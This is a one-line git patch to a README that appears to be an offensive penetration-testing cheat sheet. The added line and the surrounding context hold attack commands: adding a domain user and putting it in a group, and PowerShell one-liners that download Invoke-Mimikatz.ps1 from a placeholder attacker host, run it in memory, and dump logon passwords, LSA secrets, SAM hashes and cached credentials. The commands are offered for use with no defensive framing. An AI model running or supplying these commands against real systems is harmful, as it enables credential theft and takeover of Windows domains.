From caa55f52f306cbdd0f376cff334867c53dcdc535 Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Tue, 27 Sep 2022 10:01:58 -0400 Subject: [PATCH] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index e4df708..7c6003c 100644 --- a/README.md +++ b/README.md @@ -680,6 +680,7 @@ net user {USERNAME} {PASSWORD} /add /domain net group "{GROUP}" {USERNAME} /add # MimiKatz Cred Dump +sekurlsa::logonpasswords IEX (New-Object System.Net.Webclient).DownloadString("http://{IP ADDRESS}/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -DumpCreds IEX (New-Object System.Net.Webclient).DownloadString("http://{IP ADDRESS}/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"'